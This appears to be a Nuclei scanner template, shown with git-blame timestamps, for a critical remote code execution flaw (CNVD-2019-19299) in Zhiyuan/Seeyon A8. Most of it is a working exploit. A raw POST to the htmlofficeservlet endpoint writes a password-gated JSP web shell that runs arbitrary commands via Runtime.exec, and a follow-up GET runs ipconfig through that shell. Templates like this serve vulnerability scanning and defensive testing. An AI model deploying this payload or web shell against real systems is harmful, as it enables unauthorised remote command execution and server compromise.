2022-02-20 13:04:55 +00:00
|
|
|
id: CNVD-2019-19299
|
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: Zhiyuan A8 - Remote Code Execution
|
2022-02-20 13:04:55 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: critical
|
2022-05-13 20:26:43 +00:00
|
|
|
description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
|
2022-02-20 13:04:55 +00:00
|
|
|
reference:
|
|
|
|
- https://www.cxyzjd.com/article/guangying177/110177339
|
|
|
|
- https://github.com/sectestt/CNVD-2019-19299
|
2022-05-13 20:26:43 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
cvss-score: 10.0
|
|
|
|
cwe-id: CWE-77
|
2022-02-28 19:12:43 +00:00
|
|
|
tags: zhiyuan,cnvd,cnvd2019,rce
|
2022-02-20 13:04:55 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /seeyon/htmlofficeservlet HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Pragma: no-cache
|
|
|
|
Cache-Control: no-cache
|
|
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
|
|
|
|
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
|
|
|
Connection: close
|
|
|
|
|
|
|
|
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
|
|
|
|
OPTION=S3WYOSWLBSGr
|
|
|
|
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
|
|
|
|
= WUghPB3szB3Xwg66 the CREATEDATE
|
|
|
|
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
|
|
|
|
originalFileId = wV66
|
|
|
|
originalCreateDate = wUghPB3szB3Xwg66
|
|
|
|
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
|
|
|
|
needReadFile = yRWZdAS6
|
|
|
|
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
|
2022-02-28 19:12:43 +00:00
|
|
|
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
|
2022-02-20 13:04:55 +00:00
|
|
|
|
|
|
|
- |
|
2022-02-28 19:12:43 +00:00
|
|
|
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
|
2022-02-20 13:04:55 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
req-condition: true
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'status_code_2 == 200'
|
|
|
|
- 'contains(body_1, "htmoffice operate")'
|
|
|
|
- 'contains(body_2, "Windows IP")'
|
|
|
|
condition: and
|
2022-05-13 20:26:43 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/12
|